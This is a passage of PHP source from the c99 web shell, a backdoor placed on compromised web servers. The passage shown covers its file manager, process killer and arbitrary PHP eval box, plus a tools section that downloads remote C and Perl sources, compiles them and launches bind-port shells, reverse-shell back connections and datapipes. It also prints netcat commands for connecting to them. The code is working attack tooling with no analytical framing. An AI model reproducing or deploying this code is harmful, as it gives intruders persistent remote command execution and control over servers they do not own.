  1828.     elseif (is_file($v)) {$objects["files"][] = $row;}
  1829.     $i++;
  1830.    }
  1831.    $row = array();
  1832.    $row[] = "<b>Name</b>";
  1833.    $row[] = "<b>Size</b>";
  1834.    $row[] = "<b>Modify</b>";
  1835.    if (!$win)
  1836.   {$row[] = "<b>Owner/Group</b>";}
  1837.    $row[] = "<b>Perms</b>";
  1838.    $row[] = "<b>Action</b>";
  1839.    $parsesort = parsesort($sort);
  1840.    $sort = $parsesort[0].$parsesort[1];
  1841.    $k = $parsesort[0];
  1842.    if ($parsesort[1] != "a") {$parsesort[1] = "d";}
  1843.    $y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.sort.value='".$k.($parsesort[1] == "a"?"d":"a").";document.todo.submit();\">";
  1844.    $row[$k] .= $y;
  1845.    for($i=0;$i<count($row)-1;$i++)
  1846.    {
  1847.     if ($i != $k) {$row[$i] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.sort.value='".$i.$parsesort[1]."';document.todo.submit();\">".$row[$i]."</a>";}
  1848.    }
  1849.    $v = $parsesort[0];
  1850.    usort($objects["folders"], "tabsort");
  1851.    usort($objects["links"], "tabsort");
  1852.    usort($objects["files"], "tabsort");
  1853.    if ($parsesort[1] == "d")
  1854.    {
  1855.     $objects["folders"] = array_reverse($objects["folders"]);
  1856.     $objects["files"] = array_reverse($objects["files"]);
  1857.    }
  1858.    $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
  1859.    $tab = array();
  1860.    $tab["cols"] = array($row);
  1861.    $tab["head"] = array();
  1862.    $tab["folders"] = array();
  1863.    $tab["links"] = array();
  1864.    $tab["files"] = array();
  1865.    $i = 0;
  1866.    foreach ($objects as $a)
  1867.    {
  1868.     $v = $a[0];
  1869.     $o = basename($v);
  1870.     $dir = dirname($v);
  1871.     if ($disp_fullpath) {$disppath = $v;}
  1872.     else {$disppath = $o;}
  1873.     $disppath = str2mini($disppath,60);
  1874.     if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
  1875.     elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
  1876.     foreach ($regxp_highlight as $r)
  1877.     {
  1878.      if (ereg($r[0],$o))
  1879.      {
  1880.       if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();}
  1881.       else
  1882.       {
  1883.        $r[1] = round($r[1]);
  1884.        $isdir = is_dir($v);
  1885.        if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
  1886.        {
  1887.         if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
  1888.         $disppath = $r[2].$disppath.$r[3];
  1889.         if ($r[4]) {break;}
  1890.        }
  1891.       }
  1892.      }
  1893.     }
  1894.     $uo = urlencode($o);
  1895.     $ud = urlencode($dir);
  1896.     $uv = urlencode($v);
  1897.     $row = array();
  1898.     if ($o == ".")
  1899.     {
  1900.      $row[] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode(realpath($d.$o))."';document.todo.sort.value='".$sort."';document.todo.submit();\">".$o."</a>";
  1901.      $row[] = "LINK";
  1902.     }
  1903.     elseif ($o == "..")
  1904.     {
  1905.      $row[] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode(realpath($d.$o))."';document.todo.sort.value='".$sort."';document.todo.submit();\">".$o."</a>";
  1906.      $row[] = "LINK";
  1907.     }
  1908.     elseif (is_dir($v))
  1909.     {
  1910.      if (is_link($v))
  1911.      {
  1912.       $disppath .= " => ".readlink($v);
  1913.       $type = "LINK";
  1914.       $row[] =  "&nbsp;<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".$uv."';document.todo.sort.value='".$sort."';document.todo.submit();\">[".$disppath."]</a>";         }
  1915.      else
  1916.      {
  1917.       $type = "DIR";
  1918.       $row[] =  "&nbsp;<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".$uv."';document.todo.sort.value='".$sort."';document.todo.submit();\">[".$disppath."]</a>";
  1919.      }
  1920.      $row[] = $type;
  1921.     }
  1922.     elseif(is_file($v))
  1923.     {
  1924.      $ext = explode(".",$o);
  1925.      $c = count($ext)-1;
  1926.      $ext = $ext[$c];
  1927.      $ext = strtolower($ext);
  1928.      $row[] =  "&nbsp;<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.d.value='".$ud."';document.todo.f.value='".$uo."';document.todo.submit();\">".$disppath."</a>";
  1929.      $row[] = view_size($a[1]);
  1930.     }
  1931.     $row[] = date("d.m.Y H:i:s",$a[2]);
  1932.     if (!$win) {$row[] = $a[3];}
  1933.      $row[] =  "&nbsp;<a href=\"#\" onclick=\"document.todo.act.value='chmod';document.todo.d.value='".$ud."';document.todo.f.value='".$uo."';document.todo.submit();\"><b>".view_perms_color($v)."</b></a>";
  1934.     if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
  1935.     else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
  1936.     if (is_dir($v)){$row[] = "<a href=\"#\" onclick=\"document.todo.act.value='d';document.todo.d.value='".$uv."';document.todo.submit();\">I</a>&nbsp;".$checkbox;}
  1937.     else {$row[] = "<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".$uo."';document.todo.ft.value='info';document.todo.d.value='".$ud."';document.todo.submit();\">I</a>&nbsp;<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".$uo."';document.todo.ft.value='edit';document.todo.d.value='".$ud."';document.todo.submit();\">E</a>&nbsp;<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".$uo."';document.todo.ft.value='download';document.todo.d.value='".$ud."';document.todo.submit();\">D</a>&nbsp;".$checkbox;}
  1938.     if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
  1939.     elseif (is_link($v)) {$tab["links"][] = $row;}
  1940.     elseif (is_dir($v)) {$tab["folders"][] = $row;}
  1941.     elseif (is_file($v)) {$tab["files"][] = $row;}
  1942.     $i++;
  1943.    }
  1944.   }
  1945.   //Compiling table
  1946.   $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
  1947.   echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
  1948.   foreach($table as $row)
  1949.   {
  1950.    echo "<tr>\r\n";
  1951.    foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
  1952.    echo "</tr>\r\n";
  1953.   }
  1954.   echo "</table><hr size=\"1\" noshade><p align=\"right\">
  1955.  <script>
  1956.  function ls_setcheckboxall(status)
  1957.  {
  1958.   var id = 0;
  1959.   var num = ".(count($table)-2).";
  1960.   while (id <= num)
  1961.   {
  1962.    document.getElementById('actbox'+id).checked = status;
  1963.    id++;
  1964.   }
  1965.  }
  1966.  function ls_reverse_all()
  1967.  {
  1968.   var id = 0;
  1969.   var num = ".(count($table)-2).";
  1970.   while (id <= num)
  1971.   {
  1972.    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
  1973.    id++;
  1974.   }
  1975.  }
  1976.  </script>
  1977.  <input type=\"button\" onclick=\"ls_setcheckboxall(1);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(0);\" value=\"Unselect all\"><b>";
  1978.   if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
  1979.   {
  1980.    echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
  1981.   }
  1982.   echo "<select name=act><option value=\"".$act."\">With selected:</option>";
  1983.   echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
  1984.   echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
  1985.   if ($usefsbuff)
  1986.   {
  1987.    echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
  1988.    echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
  1989.    echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
  1990.   }
  1991.   echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
  1992.   echo "</form>";
  1993.  }
  1994. }
  1995. if ($act == "tools")
  1996. {
  1997.  $bndportsrcs = array(
  1998.   "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"),
  1999.   "c99sh_bindport.c"=>array("Using C","%path %port %pass")
  2000.  );
  2001.  $bcsrcs = array(
  2002.   "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
  2003.   "c99sh_backconn.c"=>array("Using C","%path %host %port")
  2004.  );
  2005.  $dpsrcs = array(
  2006.   "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"),
  2007.   "c99sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost")
  2008.  );
  2009.  if (!is_array($bind)) {$bind = array();}
  2010.  if (!is_array($bc)) {$bc = array();}
  2011.  if (!is_array($datapipe)) {$datapipe = array();}
  2012.  
  2013.  if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}
  2014.  if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}
  2015.  
  2016.  if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");}
  2017.  if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;}
  2018.  
  2019.  if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";}
  2020.  if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;}
  2021.  if (!empty($bindsubmit))
  2022.  {
  2023.   echo "<b>Result of binding port:</b><br>";
  2024.   $v = $bndportsrcs[$bind["src"]];
  2025.   if (empty($v)) {echo "Unknown file!<br>";}
  2026.   elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
  2027.   else
  2028.   {
  2029.    $w = explode(".",$bind["src"]);
  2030.    $ext = $w[count($w)-1];
  2031.    unset($w[count($w)-1]);
  2032.    $srcpath = join(".",$w).".".rand(0,999).".".$ext;
  2033.    $binpath = $tmpdir.join(".",$w).rand(0,999);
  2034.    if ($ext == "pl") {$binpath = $srcpath;}
  2035.    @unlink($srcpath);
  2036.    $fp = fopen($srcpath,"ab+");
  2037.    if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
  2038.    elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources!";}
  2039.    else
  2040.    {
  2041.     fwrite($fp,$data,strlen($data));
  2042.     fclose($fp);
  2043.     if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);}
  2044.     $v[1] = str_replace("%path",$binpath,$v[1]);
  2045.     $v[1] = str_replace("%port",$bind["port"],$v[1]);
  2046.     $v[1] = str_replace("%pass",$bind["pass"],$v[1]);
  2047.     $v[1] = str_replace("//","/",$v[1]);
  2048.     $retbind = myshellexec($v[1]." > /dev/null &");
  2049.     sleep(5);
  2050.     $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);
  2051.     if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}
  2052.     else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"#\" onclick=\"document.todo.act.value='processes';document.todo.grep.value='".basename($binpath)."';document.todo.submit();\"><u>View binder's process</u></a></center>";}
  2053.    }
  2054.    echo "<br>";
  2055.   }
  2056.  }
  2057.  if (!empty($bcsubmit))
  2058.  {
  2059.   echo "<b>Result of back connection:</b><br>";
  2060.   $v = $bcsrcs[$bc["src"]];
  2061.   if (empty($v)) {echo "Unknown file!<br>";}
  2062.   else
  2063.   {
  2064.    $w = explode(".",$bc["src"]);
  2065.    $ext = $w[count($w)-1];
  2066.    unset($w[count($w)-1]);
  2067.    $srcpath = join(".",$w).".".rand(0,999).".".$ext;
  2068.    $binpath = $tmpdir.join(".",$w).rand(0,999);
  2069.    if ($ext == "pl") {$binpath = $srcpath;}
  2070.    @unlink($srcpath);
  2071.    $fp = fopen($srcpath,"ab+");
  2072.    if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
  2073.    elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!";}
  2074.    else
  2075.    {
  2076.     fwrite($fp,$data,strlen($data));
  2077.     fclose($fp);
  2078.     if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
  2079.     $v[1] = str_replace("%path",$binpath,$v[1]);
  2080.     $v[1] = str_replace("%host",$bc["host"],$v[1]);
  2081.     $v[1] = str_replace("%port",$bc["port"],$v[1]);
  2082.     $v[1] = str_replace("//","/",$v[1]);
  2083.     $retbind = myshellexec($v[1]." > /dev/null &");
  2084.     echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>";
  2085.    }
  2086.   }
  2087.  }
  2088.  if (!empty($dpsubmit))
  2089.  {
  2090.   echo "<b>Result of datapipe-running:</b><br>";
  2091.   $v = $dpsrcs[$datapipe["src"]];
  2092.   if (empty($v)) {echo "Unknown file!<br>";}
  2093.   elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
  2094.   else
  2095.   {
  2096.    $srcpath = $tmpdir.$datapipe["src"];
  2097.    $w = explode(".",$datapipe["src"]);
  2098.    $ext = $w[count($w)-1];
  2099.    unset($w[count($w)-1]);
  2100.    $srcpath = join(".",$w).".".rand(0,999).".".$ext;
  2101.    $binpath = $tmpdir.join(".",$w).rand(0,999);
  2102.    if ($ext == "pl") {$binpath = $srcpath;}
  2103.    @unlink($srcpath);
  2104.    $fp = fopen($srcpath,"ab+");
  2105.    if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
  2106.    elseif (!$data = c99getsource($datapipe["src"])) {echo "Can't download sources!";}
  2107.    else
  2108.    {
  2109.     fwrite($fp,$data,strlen($data));
  2110.     fclose($fp);
  2111.     if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
  2112.     list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);
  2113.     $v[1] = str_replace("%path",$binpath,$v[1]);
  2114.     $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);
  2115.     $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);
  2116.     $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);
  2117.     $v[1] = str_replace("//","/",$v[1]);
  2118.     $retbind = myshellexec($v[1]." > /dev/null &");
  2119.     sleep(5);
  2120.     $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);
  2121.     if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";}
  2122.     else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"#\" onclick=\"document.todo.act.value='processes';document.todo.grep.value='".basename($binpath)."';document.todo.submit();\"><u>View datapipe process</u></a></center>";}
  2123.    }
  2124.    echo "<br>";
  2125.   }
  2126.  }
  2127.   <b>Binding port:</b><br><form method="POST"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d;  ">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]);  ">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]);  ">&nbsp;<select name="bind[src]"><?php
  2128.  foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
  2129.   </select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form>
  2130. <b>Back connection:</b><br><form method="POST"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d;  ">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]);  ">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]);  ">&nbsp;<select name="bc[src]"><?php
  2131. foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
  2132.  </select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form>
  2133. Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port;  </b>"!<br><br>
  2134. <b>Datapipe:</b><br><form method="POST"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d;  ">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]);  ">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]);  ">&nbsp;<select name="datapipe[src]"><?php
  2135. foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
  2136.  </select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.<?php
  2137. }
  2138. if ($act == "processes")
  2139. {
  2140.  echo "<b>Processes:</b><br>";
  2141.  if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
  2142.  else {$handler = "tasklist";}
  2143.  $ret = myshellexec($handler);
  2144.  if (!$ret) {echo "Can't execute \"".$handler."\"!";}
  2145.  else
  2146.  {
  2147.   if (empty($processes_sort)) {$processes_sort = $sort_default;}
  2148.   $parsesort = parsesort($processes_sort);
  2149.   if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
  2150.   $k = $parsesort[0];
  2151.   if ($parsesort[1] != "a") {$y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$k."a\"';document.todo.submit();\">!</a>";}
  2152.   else {$y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$k."d\"';document.todo.submit();\">!</a>";}
  2153.   $ret = htmlspecialchars($ret);
  2154.   if (!$win)
  2155.   {
  2156.    if ($pid)
  2157.    {
  2158.     if (is_null($sig)) {$sig = 9;}
  2159.     echo "Sending signal ".$sig." to #".$pid."... ";
  2160.     if (posix_kill($pid,$sig)) {echo "OK.";}
  2161.     else {echo "ERROR.";}
  2162.    }
  2163.    while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
  2164.    $stack = explode("\n",$ret);
  2165.    $head = explode(" ",$stack[0]);
  2166.    unset($stack[0]);
  2167.    for($i=0;$i<count($head);$i++)
  2168.    {
  2169.     if ($i != $k) {$head[$i] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$i.$parsesort[1]."';document.todo.submit();\"><b>".$head[$i]."</b></a>";}
  2170.    }
  2171.    $prcs = array();
  2172.    foreach ($stack as $line)
  2173.    {
  2174.     if (!empty($line))
  2175.         {
  2176.          echo "<tr>";
  2177.      $line = explode(" ",$line);
  2178.      $line[10] = join(" ",array_slice($line,10));
  2179.      $line = array_slice($line,0,11);
  2180.      if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
  2181.      $line[] = "<a href=\"#\" onclick=\"document.todo.act.value='processes';document.todo.d.value='".urlencode($d)."';document.todo.pid.value='".$line[1]."';document.todo.sig.value='9';document.todo.submit();\"><u>KILL</u></a>";
  2182.      $prcs[] = $line;
  2183.      echo "</tr>";
  2184.     }
  2185.    }
  2186.   }
  2187.   else
  2188.   {
  2189.    while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
  2190.    while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
  2191.    while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
  2192.    while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
  2193.    while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
  2194.    while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
  2195.    while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
  2196.    while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
  2197.    while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
  2198.    while (ereg("                ",$ret)) {$ret = str_replace("                ","        ",$ret);}
  2199.    while (ereg("         ",$ret)) {$ret = str_replace("         ","        ",$ret);}
  2200.    $ret = convert_cyr_string($ret,"d","w");
  2201.    $stack = explode("\n",$ret);
  2202.    unset($stack[0],$stack[2]);
  2203.    $stack = array_values($stack);
  2204.    $head = explode("        ",$stack[0]);
  2205.    $head[1] = explode(" ",$head[1]);
  2206.    $head[1] = $head[1][0];
  2207.    $stack = array_slice($stack,1);
  2208.    unset($head[2]);
  2209.    $head = array_values($head);
  2210.  
  2211.    if ($parsesort[1] != "a") {$y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$k."a\"';document.todo.submit();\">!</a>";}
  2212.    else {$y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$k."d\"';document.todo.submit();\">!</a>";}
  2213.    if ($k > count($head)) {$k = count($head)-1;}
  2214.    for($i=0;$i<count($head);$i++)
  2215.    {
  2216.     if ($i != $k) {$head[$i] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$i.$parsesort[1]."a\"';document.todo.submit();\"><b>".trim($head[$i])."</b></a>";}
  2217.    }
  2218.    $prcs = array();
  2219.    foreach ($stack as $line)
  2220.    {
  2221.     if (!empty($line))
  2222.     {
  2223.      echo "<tr>";
  2224.      $line = explode("        ",$line);
  2225.      $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
  2226.      $line[2] = intval(str_replace(" ","",$line[2]))*1024;
  2227.      $prcs[] = $line;
  2228.      echo "</tr>";
  2229.     }
  2230.    }
  2231.   }
  2232.   $head[$k] = "<b>".$head[$k]."</b>".$y;
  2233.   $v = $processes_sort[0];
  2234.   usort($prcs,"tabsort");
  2235.   if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
  2236.   $tab = array();
  2237.   $tab[] = $head;
  2238.   $tab = array_merge($tab,$prcs);
  2239.   echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
  2240.   foreach($tab as $i=>$k)
  2241.   {
  2242.    echo "<tr>";
  2243.    foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
  2244.    echo "</tr>";
  2245.   }
  2246.   echo "</table>";
  2247.  }
  2248. }
  2249. if ($act == "eval")
  2250. {
  2251.  if (!empty($eval))
  2252.  {
  2253.   echo "<b>Result of execution this PHP-code</b>:<br>";
  2254.   $tmp = ob_get_contents();
  2255.   $olddir = realpath(".");
  2256.   @chdir($d);
  2257.   if ($tmp)
  2258.   {
  2259.    ob_clean();
  2260.    eval($eval);
  2261.    $ret = ob_get_contents();
  2262.    $ret = convert_cyr_string($ret,"d","w");
  2263.    ob_clean();
  2264.    echo $tmp;
  2265.    if ($eval_txt)
  2266.    {
  2267.     $rows = count(explode("\r\n",$ret))+1;
  2268.     if ($rows < 10) {$rows = 10;}
  2269.     echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
  2270.    }
  2271.    else {echo $ret."<br>";}
  2272.   }
  2273.   else
  2274.   {
  2275.    if ($eval_txt)
  2276.    {
  2277.     echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
  2278.     eval($eval);
  2279.     echo "</textarea>";
  2280.    }
  2281.    else {echo $ret;}
  2282.   }
  2283.   @chdir($olddir);
  2284.  }
  2285.  else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
  2286.  echo "<form method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
  2287. }
  2288. if ($act == "f")
  2289. {
  2290.  if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
  2291.  {
  2292.   if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
  2293.   else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='edit';document.todo.c.value='1';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><u>Create</u></a></center>";}
  2294.  }
  2295.  else
  2296.  {
  2297.   $r = @file_get_contents($d.$f);
  2298.   $ext = explode(".",$f);
  2299.   $c = count($ext)-1;
  2300.   $ext = $ext[$c];
  2301.   $ext = strtolower($ext);
  2302.   $rft = "";
  2303.   foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
  2304.   if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
  2305.   if (empty($ft)) {$ft = $rft;}
  2306.   $arr = array(
  2307.    array("DIZ","info"),
  2308.    array("HTML","html"),
  2309.    array("TXT","txt"),
  2310.    array("Code","code"),
  2311.    array("Session","phpsess"),
  2312.    array("EXE","exe"),
  2313.    array("SDB","sdb"),
  2314.    array("INI","ini"),
  2315.    array("DOWNLOAD","download"),
  2316.    array("RTF","notepad"),
  2317.    array("EDIT","edit")
  2318.   );
  2319.   echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
  2320.   foreach($arr as $t)
  2321.   {
  2322.    if ($t[1] == $rft) {echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='".$t[1]."';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><font color=green>".$t[0]."</font></a>";}
  2323.    elseif ($t[1] == $ft) {echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='".$t[1]."';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><b><u>".$t[0]."</u></b></a>";}
  2324.    else {echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='".$t[1]."';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><b>".$t[0]."</b></a>";}
  2325.    echo " |";
  2326.   }
  2327.   echo "<hr size=\"1\" noshade>";
  2328.   if ($ft == "info")
  2329.   {
  2330.    echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
  2331.    if (!$win)
  2332.    {
  2333.     echo "<tr><td><b>Owner/Group</b></td><td> ";
  2334.     $ow = posix_getpwuid(fileowner($d.$f));
  2335.     $gr = posix_getgrgid(filegroup($d.$f));
  2336.     echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
  2337.    }
